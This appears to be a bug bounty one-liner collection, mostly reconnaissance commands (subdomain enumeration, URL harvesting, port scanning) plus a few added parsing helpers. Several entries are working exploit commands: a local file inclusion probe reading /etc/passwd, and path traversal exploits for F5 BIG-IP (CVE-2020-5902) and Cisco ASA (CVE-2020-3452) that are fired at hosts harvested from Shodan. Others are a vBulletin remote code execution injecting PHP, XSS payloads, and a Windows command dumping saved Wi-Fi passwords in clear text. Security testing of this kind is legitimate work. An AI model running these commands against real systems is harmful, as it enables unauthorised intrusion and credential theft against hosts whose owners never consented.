A collection of awesome one-liner scripts, especially for bug bounty. Thanks for visiting my repository! If you find this and my other work useful, please consider buying me a coffee to support my future projects.
Please note that each command is only an example and may not work correctly as-is. Test it and make sure you understand what it does before using it against anything that matters.
This repository stores and houses various one-liners for bug bounty tips, provided by me as well as contributed by the community. Your contributions and suggestions are heartily welcome.
This section defines the placeholders used throughout the one-line commands/scripts.
- 1.1. "HOST" stands for a single hostname, (sub)domain, or IP address, e.g. a domain name or 127.0.0.1.
- 1.2. "HOSTS.txt" is a file containing more than one entry of the kind defined in 1.1, one per line.
- 2.1. "URL" stands for a full URL, i.e. something starting with the http:// or https:// scheme.
- 2.2. "URLS.txt" is a file containing more than one entry of the kind defined in 2.1, one per line.
- 3.1. "FILE.txt" or "FILE1.txt", "FILE2.txt", ... are the input files a command/script needs, according to its context.
- 4.1. "OUT.txt" or "OUT1.txt", "OUT2.txt", ... are the files in which the executed command stores its results.
Local File Inclusion
gau HOST | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -v -L --retry 3 --retry-delay 5 --retry-max-time 30 -s "%" 2>&1 | grep -q "root:x" && echo -e "\e[31mVULN! %\e[0m" || echo -e "\e[32mSAFE! %\e[0m"'
Note: xargs substitutes each URL into the double-quoted string inside sh -c, so a URL containing quotes or $ can break or alter the inner command; feed it URL-encoded input only.
Open Redirect
export LHOST="URL"; gau HOST | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'response=$(curl -Is "%" -w %{url_effective} -o /dev/null -s); if echo "$response" | grep -q "Location: $LHOST"; then echo -e "\e[32mVULN\e[39m! %"; elif echo "$response" | grep -q "HTTP/1.1 3"; then echo -e "\e[33mPOTENTIAL VULN\e[39m! %"; else echo -e "\e[31mNot VULN\e[39m"; fi'
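The three-way verdict of the open-redirect one-liner, factored into a shell function that reads a saved header block so the logic can be exercised offline. This is an added example, not code from the repository; it assumes the headers were captured with `curl -sI "$url"`, and the sample headers below are constructed, not real responses. It also handles two cases the one-liner misses: header names are case-insensitive, and servers speaking HTTP/2 send a `HTTP/2 302` status line rather than `HTTP/1.1 302`.

```shell
# Added example (not from the repository). Reads raw response headers on stdin,
# takes the injected redirect target as $1, prints VULN / POTENTIAL / SAFE.
classify_redirect() {
  lhost="$1"                      # the injected redirect target (LHOST in the one-liner)
  headers=$(tr -d '\r')           # curl keeps CRLF line endings; drop the CR so anchors work
  # Location is matched case-insensitively and the status line accepts any HTTP
  # version, so "HTTP/2 302" counts as a redirect too.
  if printf '%s\n' "$headers" | grep -i '^location:' | grep -qF "$lhost"; then
    echo VULN
  elif printf '%s\n' "$headers" | grep -Eq '^HTTP/[0-9.]+ 3[0-9][0-9]'; then
    echo POTENTIAL
  else
    echo SAFE
  fi
}

# Constructed sample responses (not captured from any real host).
HDR_VULN='HTTP/1.1 302 Found
Location: https://attacker.example/
Content-Length: 0'

HDR_HTTP2='HTTP/2 301
location: /login?next=%2Fhome
content-length: 0'

HDR_SAFE='HTTP/1.1 200 OK
Content-Type: text/html'

# In the real pipeline: curl -sI "$url" | classify_redirect "$LHOST"
printf '%s\n' "$HDR_VULN" | classify_redirect https://attacker.example   # prints VULN
```

`grep -qF` compares the Location value literally, so a target such as `https://attacker.example` is not reinterpreted as a regex (the `.` would otherwise match any character).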
Prototype Pollution
cat FILE.txt | httpx -silent -threads 300 | anew -q FILE.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' FILE.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep --color "VULNERABLE" > output.txt
Password Dump (saved Wi-Fi profiles, Windows cmd.exe)
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @if "%j" NEQ "" (echo SSID: %j & netsh wlan show profiles %j key=clear | findstr "Key Content") >> Wifi-password.txt
F5 BIG-IP TMUI Path Traversal (CVE-2020-5902)
shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read -r host; do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && printf '%s \033[0;31mVulnerable\033[0m\n' "$host" || printf '%s \033[0;32mNot Vulnerable\033[0m\n' "$host"; done
Cisco ASA/FTD Web Services Path Traversal (CVE-2020-3452)
GREEN='\033[0;32m'; RED='\033[0;31m'; NC='\033[0m'; while read -r LINE; do curl -s -k "https://$LINE/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" | head | grep -q "Cisco" && echo -e "[${GREEN}VULNERABLE${NC}] $LINE" || echo -e "[${RED}NOT VULNERABLE${NC}] $LINE"; done < HOSTS.txt
Reflected XSS via module management endpoint
cat URLS.txt | while read -r h; do curl -sk "$h/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(1)+xx=%22test&from_url=x" | grep -qs "onmouse" && echo "$h: VULNERABLE"; done
vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution
shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read -r host; do curl -s "http://$host/ajax/render/widget_tabbedcontainer_tab_panel" -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && printf '%s \033[0;31mVulnerable\033[0m\n' "$host" || printf '%s \033[0;32mNot Vulnerable\033[0m\n' "$host"; done
Extract Endpoints from swagger.json
curl -s https://HOST/v2/swagger.json | jq '.paths | keys[]'
Extract Juicy Information
@Prial Islam Khan
for sub in $(cat HOSTS.txt); do gron "$sub?limit=100&page=1" | grep "\burl\b" | gron --ungron | jq | egrep -wi 'url' | awk '{print $2}' | sed 's/"//g'| sort -u | tee -a OUT.txt ;done
Get CIDR & Orgz from Target Lists
for DOMAIN in $(cat domains.txt); do for ip in $(dig a $DOMAIN +short); do whois $ip | grep -e "CIDR\|Organization" | tr -s " " | paste - -; done | uniq | tee -a output.txt; done
Find Subdomains TakeOver
subfinder -d HOST >> FILE; assetfinder --subs-only HOST >> FILE; amass enum -norecursive -noalts -d HOST >> FILE; subjack -w FILE -t 100 -timeout 30 -ssl -c $GOPATH/src/ -v 3 >> takeover ;
Dump Custom URLs from ParamSpider
cat HOSTS.txt | xargs -I % python3 -l high -o ./OUT/% -d %;
URLs Probing with cURL + Parallel
cat HOSTS.txt | parallel -j50 -q curl -w 'Status:%{http_code}\t Size:%{size_download}\t %{url_effective}\n' -o /dev/null -sk
Dump In-scope Assets from @dwisiswant0
curl -sL | jq -r '.programs[].domains | to_entries | .[].value'
HackerOne Programs
curl -sL | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type] | @tsv'
BugCrowd Programs
curl -sL | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'
Intigriti Programs
curl -sL | jq -r '.[].targets.in_scope[] | [.endpoint, .type] | @tsv'
YesWeHack Programs
curl -sL | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'
HackenProof Programs
curl -sL | jq -r '.[].targets.in_scope[] | [.target, .type, .instruction] | @tsv'
Federacy Programs
curl -sL | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'
Dump URLs from sitemap.xml
curl -s http://HOST/sitemap.xml | xmllint --format - | grep -e 'loc' | sed -r 's|</?loc>||g'
Pure Bash Linkfinder
curl -s $1 | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort | uniq | grep ".js" > FILE.txt; while IFS= read link; do python -i "$link" -o cli; done < FILE.txt | grep $2 | grep -v $3 | sort -n | uniq; rm -rf FILE.txt
CORS Misconfiguration
site="URL"; origin="https://attacker.example"; gau "$site" | while read -r url; do if curl -sI -H "Origin: $origin" "$url" | grep -qi "^access-control-allow-origin: *$origin"; then echo "[Potential CORS Found] $url"; else echo "Nothing on $url"; fi; done
Set origin to an origin you control (the value above is a placeholder); the check fires when the server echoes it back in Access-Control-Allow-Origin.
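The reflected-origin check is only half the story: a reflected Origin is exploitable for authenticated data when Access-Control-Allow-Credentials is also true, while a wildcard `*` cannot be combined with credentials by browsers. The function below grades a saved header block along those lines. It is an added example, not code from the repository; it assumes the request was sent with `Origin: $origin` and that the headers were captured with `curl -sI`; the sample headers are constructed.

```shell
# Added example (not from the repository). Reads raw response headers on stdin,
# takes the Origin value that was sent as $1, prints a verdict.
cors_verdict() {
  origin="$1"
  headers=$(tr -d '\r')
  acao=$(printf '%s\n' "$headers" | grep -i '^access-control-allow-origin:' | sed 's/^[^:]*: *//' | head -n 1)
  acac=$(printf '%s\n' "$headers" | grep -i '^access-control-allow-credentials:' | sed 's/^[^:]*: *//' | head -n 1)
  if [ "$acao" = "$origin" ] && [ "$acac" = "true" ]; then
    echo "REFLECTED+CREDENTIALS"  # attacker origin echoed back and cookies allowed: authenticated responses readable cross-origin
  elif [ "$acao" = "$origin" ]; then
    echo "REFLECTED"              # echoed back without credentials: only unauthenticated content exposed
  elif [ "$acao" = "*" ]; then
    echo "WILDCARD"               # browsers refuse credentials with "*", so usually low impact
  else
    echo "NONE"
  fi
}

# Constructed sample responses (not captured from any real host).
HDR_CORS_CRED='HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://attacker.example
Access-Control-Allow-Credentials: true
Vary: Origin'

HDR_CORS_WILD='HTTP/1.1 200 OK
access-control-allow-origin: *'

HDR_CORS_NONE='HTTP/1.1 200 OK
Content-Type: application/json'

# In the real pipeline: curl -sI -H "Origin: $origin" "$url" | cors_verdict "$origin"
printf '%s\n' "$HDR_CORS_CRED" | cors_verdict https://attacker.example   # prints REFLECTED+CREDENTIALS
```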
Find Hidden Servers and/or Admin Panels
ffuf -c -u URL -H "Host: FUZZ" -w FILE.txt
Recon Using
curl -s -w "\n%{http_code}" | jq -r .[].domain
Find Live Host/Domain/Assets
subfinder -d HOST -silent | httpx -silent -follow-redirects -mc 200 | cut -d '/' -f3 | sort -u
XSS without gf
waybackurls HOST | grep '=' | qsreplace '"><script>alert(1)</script>' | while read -r host; do curl -sk --path-as-is "$host" | grep -qs "<script>alert(1)</script>" && echo "$host is vulnerable"; done
Get Subdomains from IPs
python3 HOSTS.txt > OUT.txt
Gather Domains from Content-Security-Policy
curl -vs URL --stderr - | awk '/^content-security-policy:/' | grep -Eo "[a-zA-Z0-9./?=_-]*" | sed -e '/\./!d' -e '/[^A-Za-z0-9._-]/d' -e 's/^\.//' | sort -u
Nmap IP:PORT Parser Piped to HTTPX
nmap -v0 HOST -oX /dev/stdout | jc --xml -p | jq -r '.nmaprun.host | (.address["@addr"] + ":" + .ports.port[]["@portid"])' | httpx --silent
This assumes a single scanned host with a single address element; jc turns repeated XML elements (several hosts, or an IP plus a MAC address) into arrays, so adjust the jq path accordingly.
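The same IP:PORT extraction without jc/jq, done in awk straight from nmap's -oX output, and restricted to ports whose state is "open" so closed or filtered entries never reach httpx. This is an added example, not code from the repository; the XML below is a constructed sample in nmap's output format, not a real scan.

```shell
# Added example (not from the repository). Reads nmap -oX XML on stdin and
# prints ip:port for every open port, in document order.
nmap_open_hostports() {
  awk '
    # remember the IPv4 address of the host currently being parsed (skip MAC entries)
    /<address / && /addrtype="ipv4"/ { match($0, /addr="[^"]+"/); ip = substr($0, RSTART + 6, RLENGTH - 7) }
    # a new <port> element: record its number and reset the open flag
    /<port /  { match($0, /portid="[^"]+"/); port = substr($0, RSTART + 8, RLENGTH - 9); open = 0 }
    /<state / && /state="open"/ { open = 1 }
    # emit when the element closes; nmap usually puts <port>...</port> on one line
    /<\/port>/ { if (open && ip != "" && port != "") print ip ":" port }
  '
}

# Constructed sample in nmap XML format (not a real scan).
SAMPLE_NMAP_XML='<?xml version="1.0"?>
<nmaprun scanner="nmap">
<host><status state="up"/>
<address addr="192.0.2.10" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/><service name="ssh"/></port>
<port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/><service name="http"/></port>
<port protocol="tcp" portid="443"><state state="closed" reason="reset"/></port>
</ports>
</host>
<host><status state="up"/>
<address addr="192.0.2.11" addrtype="ipv4"/>
<address addr="00:11:22:33:44:55" addrtype="mac"/>
<ports>
<port protocol="tcp" portid="8080"><state state="open" reason="syn-ack"/></port>
</ports>
</host>
</nmaprun>'

# In the real pipeline: nmap -v0 HOST -oX - | nmap_open_hostports | httpx --silent
printf '%s\n' "$SAMPLE_NMAP_XML" | nmap_open_hostports
```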
Get Subdomains from
curl -s "$1?full=1#result" | grep "<td><a" | cut -d '"' -f 2 | grep http | cut -d '/' -f3 | sed 's/#results//g' | sort -u
Get Subdomains from
curl -s | jq -r .FDNS_A[] | cut -d',' -f2 | sort -u
export domain="HOST"; curl "$domain" | jq -r .Results'[]' | rev | cut -d ',' -f1 | rev | sort -u | grep "\.$domain"
Get Subdomains from
curl -s "" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
Get Subdomains from VirusTotal
curl -s "" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
Get Subdomain with cyberxplore
curl -s | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+"
Get Subdomains from CertSpotter
curl -s "" | jq .[].dns_names | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
Get Subdomains from Archive
curl -s "*.HOST/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u
Get Subdomains from JLDC
curl -s "" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
Get Subdomains from securitytrails
curl -s "" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep ".HOST" | sort -u
Bruteforcing Subdomain using DNS Over
while read sub; do echo "$sub.HOST&type=A&cd=true" | parallel -j100 -q curl -s -L --silent | grep -Po '[{\[]{1}([,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]|".*?")+[}\]]{1}' | jq | grep "name" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep ".HOST" | sort -u ; done < FILE.txt
Get Subdomains With
curl --silent | grep -oE "[a-zA-Z0-9._-]+\.HOST" | sort -u
Get Subdomains With
curl --silent -X POST -d "name=https%3A%2F%2FHOST" | grep -oE "[a-zA-Z0-9._-]+\.HOST" | sort -u
Get Subdomains from
curl -s "" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
Sort & Tested Domains from
curl "" |jq -r '.[].rawDomains[]' | sed 's/ //g' | sort -u | httpx -silent
Subdomain Bruteforcer with FFUF
ffuf -u https://FUZZ.HOST -w FILE.txt -v | grep "| URL |" | awk '{print $4}'
Find Allocated IP Ranges for ASN from IP Address
whois -h -i origin -T route $(whois -h IP | grep origin: | awk '{print $NF}' | head -1) | grep -w "route:" | awk '{print $NF}' | sort -n
Extract IPs from a File
grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' file.txt
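The octet pattern above has no word boundaries, so `grep -o` will happily report `234.5.6.7` out of `1234.5.6.7` or pick substrings out of version strings. The function below reuses the same octet class but matches whole words (`-w`), so only standalone addresses are reported, de-duplicated. This is an added example, not code from the repository; the sample text is constructed.

```shell
# Added example (not from the repository). Extracts unique IPv4 addresses from
# stdin, rejecting digit runs glued to an address and dotted version strings.
OCTET='(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)'
extract_ipv4() {
  # -w requires the match to be bounded by non-word characters on both sides
  grep -Eow "$OCTET\.$OCTET\.$OCTET\.$OCTET" | LC_ALL=C sort -u
}

# Constructed sample text (not from any real log).
SAMPLE_TEXT='srv 10.0.0.1 talked to 192.0.2.44 and 10.0.0.1 again
junk: 1234.5.6.7 10.0.0.2561 999.1.1.1 v1.2.3.4 build 2021.03.01.1'

# In the real pipeline: extract_ipv4 < file.txt
printf '%s\n' "$SAMPLE_TEXT" | extract_ipv4   # prints 10.0.0.1 and 192.0.2.44 only
```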
Ports Scan without CloudFlare
subfinder -silent -d HOST | filter-resolved | cf-check | sort -u | naabu -rate 40000 -silent -verify | httprobe
Create Custom Wordlists
gau HOST | unfurl -u keys | tee -a FILE1.txt; gau HOST | unfurl -u paths | tee -a FILE2.txt; sed 's#/#\n#g' FILE2.txt | sort -u | tee -a FILE1.txt | sort -u; rm FILE2.txt; sed -i -e 's/\.css\|\.png\|\.jpeg\|\.jpg\|\.svg\|\.gif\|\.woff\|\.bmp//g' FILE1.txt
cat HOSTS.txt | httprobe | xargs curl | tok | tr '[:upper:]' '[:lower:]' | sort -u | tee -a FILE.txt
Find JavaScript Variables (candidate parameters for XSS testing)
assetfinder --subs-only HOST | gau | grep -Ev '\.(css|png|jpeg|jpg|svg|gif|woff)' | while read -r url; do vars=$(curl -s "$url" | grep -Eo "var [a-zA-Z0-9_]+" | sed -e "s,var ,$url?,g" -e 's/ //g' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n" "\e[1;32m$vars"; done
Extract Endpoints from JavaScript
cat FILE.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | sort -u
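The one-liner above only catches double-quoted paths. The function below is an added example, not code from the repository: it applies the same idea to both double- and single-quoted string literals, allows `.` and `-` in paths (for `/api/export.json` style endpoints), and skips protocol-relative `//host/...` strings that start with a slash but are not endpoints. The JavaScript sample is constructed.

```shell
# Added example (not from the repository). Reads JavaScript on stdin, prints
# unique absolute paths found in quoted string literals.
js_endpoints() {
  # first char after the slash may not be another slash, which excludes "//cdn/..."
  grep -oE "[\"'](/[a-zA-Z0-9_?=&.-][a-zA-Z0-9_/?=&.-]*)[\"']" \
    | sed -e "s/^[\"']//" -e "s/[\"']\$//" \
    | LC_ALL=C sort -u
}

# Constructed sample script (not taken from any real site).
SAMPLE_JS=$(cat <<'EOF'
const API = "/api/v1/users";
fetch('/api/v1/users?limit=10&page=2');
$.post("/admin/export.json", data);
var cdn = "//cdn.example/lib.js";
var dup = "/api/v1/users";
EOF
)

# In the real pipeline: js_endpoints < FILE.js
printf '%s\n' "$SAMPLE_JS" | js_endpoints
```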